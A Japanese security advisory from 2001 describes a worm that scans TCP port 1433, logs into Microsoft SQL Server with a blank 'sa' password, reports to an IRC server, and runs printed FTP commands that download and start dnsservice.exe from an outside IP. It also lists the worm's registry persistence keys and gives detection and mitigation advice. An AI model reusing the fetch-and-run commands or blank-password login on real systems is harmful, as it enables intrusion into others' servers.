マイクロソフトSQLサーバーを狙ったワームが蔓延中

概要：
　TCPポート1433を走査しているワームが蔓延中との報告がある。1433ポートはマイクロソフト社のSQL サーバーのポートとして使用される事が多い。1433ポートが開いている事をワームが確認すると、ワームはホストへの侵入をユーザー名sa、パスワードはブランク（無

国際海外情報

2001年11月22日（木） 12時00分

概要：
　TCPポート1433を走査しているワームが蔓延中との報告がある。1433ポートはマイクロソフト社のSQL サーバーのポートとして使用される事が多い。1433ポートが開いている事をワームが確認すると、ワームはホストへの侵入をユーザー名sa、パスワードはブランク（無し）で試みる。アプリケーションの多くがSQLサポートを使用している為、システム管理者が使用するＩＤとしてデフォルトが"sa"になっておりパスワードは設定されていない。

　ログオンに成功すると、ポート6669にあるbots.kujikiri.netのIRCサーバーに接続する。ワームがホストに到達すると、IRCチャンネルに"ホストが感染した"というメッセージを残す。次にIPアドレス207.29.192.160(フィラデルフィア美術館に関係したアドレス)にFTP接続し以下のコマンドを実行する。

ftp
foo.com
bin
cd pub
cd tmp
get dnsservice.exe
start dnsservice.exe
close
quit

　上記の"ftp"はFTPアクセスに使用されたユーザ−名で" foo.com "はパスワードとして使用されている。感染したホストにdnsservice.exeをダウンロードし実行する仕掛けになっている。現段階ではこの実行ファイルによる影響は分っていない。

　更にコンピュータが起動する度にプログラムが走るようにレジストリに以下の3つのキーが書き加えられる。

SOFTWAREMicrosoftWindowsCurrentVersionRunTaskReg
SOFTWAREMicrosoftMSSQLServerClientSuperSocketNetLibProtocolOrder
SOFTWAREMicrosoftMSSQLServerClientConnectToDSQUERY

情報ソース：
Neohapis Archives (MS SQL HACKING, ), Nov. 13, 2000
http://archives.neohapsis.com/archives/ntbugtraq/2000-q4/0094.html
incidents@securityfocus.com (Douglas P. Brown (dugbrown@email.unc.edu)), Nov. 20, 2001
BugTraq (Patrick Andry, pandry@wolverinefreight.ca), Nov. 20, 2001
BugTraq (Arthur Donkers, arthur@reseau.nl), Nov. 20, 2001
Incidents.org Oct. 04, 2001
http://www.incidents.org/diary/october01/100401.php#043
iDEFENSE Intelligence Operations, Nov. 20, 2001
iDEFENSE Labs, Nov. 20, 2001

分析：
　目的は不明だが、ワームは開いている1433TCPポートを走査している。このポートは通常、SQLサーバーを使用するProject 2000, Viso2000, Access 2000 及び Visual Studio 6.0が使用されている時に稼動する。

　SANS研究所によれば、最近、ポート1433の走査が盛んに行われたのは今年の10月上旬頃からとの報告がある。多くのスキャンは韓国発である事も確認されている。

　現時点ではアドレス207.29.192.160のFTPサーバー及び関連している実行ファイルの情報は入手出来ていないが、ワームの当バージョンは繁殖していない可能性もある。但し、将来、Ramenワームの様に新に感染したホストに自らのコピーをアップロード出来る亜種が発生する可能性もある。この様な亜種が発生すれば繁殖を抑える事は難しくなる。

検知方法：
　上記のレジストリがあれば感染している可能性がある。さらに Windows NT.4.0/2000では、システム管理者がMSSQLサーバーサービスが稼動していればコントロールパネルのサービスで確認する事ができる。IDS（侵入検知）で上記のテキスト文をftpセッション若しくはIRCとFTPに出て行くコネクションをモニターする事でワームを検知する事ができる。

暫定処置：
　コマンドプロンプトでnetstat -aのコマンドをかけて現在のポートの使用状況が確認できる。もし、TCP 1433ポートがあればSQLの機能と関連しているデフォルトのユーザ名、パスワードを変更する。また、TCP 1433ポートがインターネット接続に必要なポートでなければ、ルーター又はファイヤーウォールに当該ポートのingress/egressフィルタリング制限をかけると更に良い。

（詳しくはScan Daily EXpress本誌をご覧下さい）
http://vagabond.co.jp/vv/m-sdex.htm

※この情報はiDEFENSE社（ http://www.idefense.co.jp/ ）より提供いただいております。情報の内容は以下の時点におけるものです
【23:50 GMT、11、20、2001】

《ScanNetSecurity》

Scan PREMIUM 会員限定記事

Scan PREMIUM 会員限定記事特集をもっと見る

マイクロソフトSQLサーバーを狙ったワームが蔓延中

Scan PREMIUM 会員限定記事

ガートナークラウドクッキング教室～ CCoE 構築の重要性

OWASP データブリーチ

悪夢の検証大英図書館ランサムウェア～過ちが語る普遍的な物語

AI アプリ標的ゼロクリックワーム開発／北韓国半導体企業へ攻撃／米司法省 APT31 メンバー訴追ほか [Scan PREMIUM Monthly Executive Summary 2024年3月度]

カテゴリ別新着記事

Scan PREMIUM 会員限定記事

ガートナー クラウドクッキング教室 ～ CCoE 構築の重要性

OWASP データブリーチ

悪夢の検証 大英図書館ランサムウェア ～ 過ちが語る普遍的な物語

AI アプリ標的 ゼロクリックワーム開発／北 韓国半導体企業へ攻撃／米司法省 APT31 メンバー訴追 ほか [Scan PREMIUM Monthly Executive Summary 2024年3月度]

カテゴリ別新着記事

脆弱性と脅威 記事一覧へ

Proscend Communications 製 M330-W および M330-W5 に OS コマンドインジェクションの脆弱性

Oracle Java に攻撃された場合の影響が大きい脆弱性、修正プログラムの適用を呼びかけ

Ivanti Connect Secure と Ivanti Policy Secure Gateways に複数の脆弱性、1 月以降の状況を整理

Windows DNS の脆弱性情報が公開

バッファロー製無線 LAN ルータに複数の脆弱性

Palo Alto Networks 社製 PAN-OS GlobalProtect に OS コマンドインジェクションの脆弱性

インシデント・事故 記事一覧へ

東京高速道路のメールアカウントを不正利用、大量のメールを送信

組込み機器のイーアールアイに不正アクセス、スパムメール送信の踏み台に

インフォマート 公式 Facebook ページに不正ログイン

フュートレックにランサムウェア攻撃、本番環境への侵入形跡は存在せず

転職先で営業活動に活用、プルデンシャル生命保険 元社員 顧客情報持ち出し

東芝テックが利用するクラウドサービスに不正アクセス、取引先や従業員の個人情報が閲覧された可能性

調査・レポート・白書・ガイドライン 記事一覧へ

セキュリティ対策は株価を上げるのか ～ 株主総利回り（TSR）の平均値は高い傾向

被害額オレオレ詐欺の３倍 時間かけ信頼醸成「SNS型投資詐欺」～トビラシステムズ独自調査

プルーフポイント、マルウェア配布する YouTube チャンネル特定

IT部門か全員かそれとも政府か ～ サイバー攻撃から守る責任は誰にある？ KnowBe4 調査

初動対応者同士の情報共有が不可欠 ランサムウェア攻撃への対応

復旧失敗確率 3 分の 2、ランサムウェア身代金支払い ～ JIPDEC、ITR 調査

研修・セミナー・カンファレンス 記事一覧へ

ガートナー クラウドクッキング教室 ～ CCoE 構築の重要性

Reject 運用のポイント他 ～ 日本プルーフポイント「DMARC Conference 2024」5 月末 大手町で開催

韓国の 2024年 セキュリティ市場規模 8,000 億円見込 ～ SECON & eGISEC 2024 開催

エーアイセキュリティラボ、脆弱性診断の自動化・内製化のための無料ツールと AI 活用解説 4/18 セミナー開催

中高生サイバーセキュリティ競技会「CyberSakura」第3回、京都府立嵯峨野高等学校 チーム「HEXAGON」優勝

「引っかかるのは当たり前」が前提、フィッシングハンターが提案する対策のポイント ～ JPAAWG 6th General Meeting レポート

製品・サービス・業界動向 記事一覧へ

脆弱性診断自動化ツール「AeyeScan」の SSO 機能が SAML 認証に対応

セキュリティ診断会社と開発会社が業務提携 ～ SHIFT SECURITY とフォージビジョン

賞金総額 1 万ドル「LINE CTF 2024」GMOイエラエ 国内 1 位

警察庁、サイバー事案通報の統一窓口を設置

脆弱性診断自動化ツール「AeyeScan」にシングルサインオン機能、大規模ユーザーにも対応

ALSI、国産脅威インテリジェンスサービス「InterSafe Threat Intelligence Platform」提供

おしらせ 記事一覧へ

創刊25周年記念キャンペーンのノベルティが届きました！（25周年記念キャンペーンは本日終了です）

人気連載 Scan PREMIUM Monthly Executive Summary の岩{丼}先生の著作にサインいただきました [Scan PREMIUM 創刊25周年記念キャンペーン 読者特典]

Scan PREMIUM 創刊25周年記念キャンペーン実施中

ScanNetSecurity 創刊25周年御礼の辞（上野宣）

小説内に登場するバーで直筆サインをいただきました ～ 創刊24周年キャンペーン 11/30 迄

「果たされた約束」アフタヌーンティー開催レポート ～ 創刊24周年キャンペーン実施のおしらせ

ガートナークラウドクッキング教室～ CCoE 構築の重要性

悪夢の検証大英図書館ランサムウェア～過ちが語る普遍的な物語

AI アプリ標的ゼロクリックワーム開発／北韓国半導体企業へ攻撃／米司法省 APT31 メンバー訴追ほか [Scan PREMIUM Monthly Executive Summary 2024年3月度]

脆弱性と脅威記事一覧へ

インシデント・事故記事一覧へ

インフォマート公式 Facebook ページに不正ログイン

転職先で営業活動に活用、プルデンシャル生命保険元社員顧客情報持ち出し

調査・レポート・白書・ガイドライン記事一覧へ

セキュリティ対策は株価を上げるのか～株主総利回り（TSR）の平均値は高い傾向

被害額オレオレ詐欺の３倍時間かけ信頼醸成「SNS型投資詐欺」～トビラシステムズ独自調査

IT部門か全員かそれとも政府か～サイバー攻撃から守る責任は誰にある？ KnowBe4 調査

初動対応者同士の情報共有が不可欠ランサムウェア攻撃への対応

復旧失敗確率 3 分の 2、ランサムウェア身代金支払い～ JIPDEC、ITR 調査

研修・セミナー・カンファレンス記事一覧へ

ガートナークラウドクッキング教室～ CCoE 構築の重要性

Reject 運用のポイント他～日本プルーフポイント「DMARC Conference 2024」5 月末大手町で開催

韓国の 2024年セキュリティ市場規模 8,000 億円見込～ SECON & eGISEC 2024 開催

中高生サイバーセキュリティ競技会「CyberSakura」第3回、京都府立嵯峨野高等学校チーム「HEXAGON」優勝

「引っかかるのは当たり前」が前提、フィッシングハンターが提案する対策のポイント～ JPAAWG 6th General Meeting レポート

製品・サービス・業界動向記事一覧へ

セキュリティ診断会社と開発会社が業務提携～ SHIFT SECURITY とフォージビジョン

賞金総額 1 万ドル「LINE CTF 2024」GMOイエラエ国内 1 位

おしらせ記事一覧へ

人気連載 Scan PREMIUM Monthly Executive Summary の岩{丼}先生の著作にサインいただきました [Scan PREMIUM 創刊25周年記念キャンペーン読者特典]

小説内に登場するバーで直筆サインをいただきました～創刊24周年キャンペーン 11/30 迄

「果たされた約束」アフタヌーンティー開催レポート～創刊24周年キャンペーン実施のおしらせ